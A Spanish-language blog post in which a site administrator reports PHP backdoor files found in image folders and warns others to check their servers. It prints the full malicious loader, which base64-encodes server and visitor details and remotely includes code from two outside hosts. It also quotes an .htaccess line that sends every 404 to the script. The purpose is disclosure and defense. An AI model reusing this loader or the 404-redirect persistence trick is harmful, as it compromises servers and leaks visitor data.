Malditos Scriptkiddies o seudo hackers!.

He encontrado en unas carpetas de imagenes, unos archivos con extensión PHP y con nombres de numeros aleatorios (eso creo), en donde esta el siguiente codigo:

<br /> < ?<br /> error_reporting(0);<br /> $s="e";<br /> $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);<br /> $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);<br /> $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);<br /> $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);<br /> $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);<br /> $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);<br /> $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);<br /> $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);<br /> $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);<br /> $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);</p>
<p>$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".<br /> base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".<br /> base64_encode($i).".".base64_encode($j);</p>
<p>if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){<br /> } else {<br /> include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);<br /> }<br /> ?><br /> 

y bueno, a simple vista no significa nada a excepto de unos includes medio sospechosos!., con una cadena codificada, si descodificamos la cadena son unas URL, en donde se efectua el ataque y robo del servidor, supongo que para enviar SPAM! y mas SPAM!…., esta es la traduccion de base64 a algo entendible

base64_decode(“aHR0cDovLw==”) ‘http://’
base64_decode(“d3d3My5yc3NuZXdzLndz”) ‘www3.rssnews.ws’
base64_decode(“d3d3My54bWxkYXRhLmluZm8=”) ‘www3.xmldata.info’

Ahora bien, la pregunta para solucionar eso es, alguien sabe alguna forma de desabilitar que en un include o requiere de PHP se pueda leer rutas externas mediante HTTP, HTTPS ????, y que solo pueda leer contenidos de la maquina local??.., creo que activando esa directiva podremos evitar muchos de estos ataques.

Tambien para variar he encontrado un archivo .htaccess dentro del mismo directorio de los archivos sospechosos de PHP que contiene lo siguiente:

Options -MultiViews
ErrorDocument 404 //data/phoo/45757.php

Muy ingenioso su script no??, asi por cada error 404 manda llamar su mentado script y quien sabe que tantas cochinadas haran!..,

Tambien sera algun bug del gadget Phoo del Jaws???, o sera que como es un servidor compartido, algun otro usuario esta enviando este tipo de cosas??… tendre que revisar los logs a ver si veo algo extraño., pero de mientras si tienen un server, verifiquen sus archivos!, no vaya a ser que esten infectados

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *